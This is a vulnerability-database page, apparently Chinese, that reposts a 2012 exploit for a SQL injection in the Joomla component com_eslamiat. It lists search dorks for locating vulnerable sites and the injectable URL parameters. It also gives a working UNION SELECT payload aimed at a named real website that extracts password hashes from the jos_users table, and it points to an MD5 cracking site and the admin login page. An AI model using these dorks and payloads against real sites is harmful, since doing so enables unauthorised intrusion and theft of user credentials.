Joomla com_eslamiat Sql Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047356 漏洞类型
发布时间 2012-06-06 更新时间 2012-06-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060061
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-------------------- IN The NAme OF God --------------------

-====Joomla com_eslamiat Sql Injection Vulnerability====-

# Exploit Title: Joomla com_eslamiat Sql Injection Vulnerability
# Exploit Author: Siamak.Black
# Tested on: BackTrack , 7 , Redhat
# Version : 1.5
# Script Site : http://www.joomla.org
# MAil : siam4k.black@yahoo.com
# Home : IRaNHACK.ORG
# Team : IRANHACK SECURITY TEAM

-====Dork====-

inurl:index.php?option=com_eslamiat&Itemid=

inurl:com_eslamiat&Itemid=

-====Exploit====-

http://Site.CoM/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=[Sqli]

http://Site.CoM/index.php?option=com_eslamiat&Itemid=[Sqli]

-====Example====-

http://arabic.irib.ir/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=-912+/*!union*/+/*!select*/+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--

-====information====-

Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/

Admin Page ~~~~~~~~~> Administrator

-====Tnx To====-

Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz

MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

iranhack.org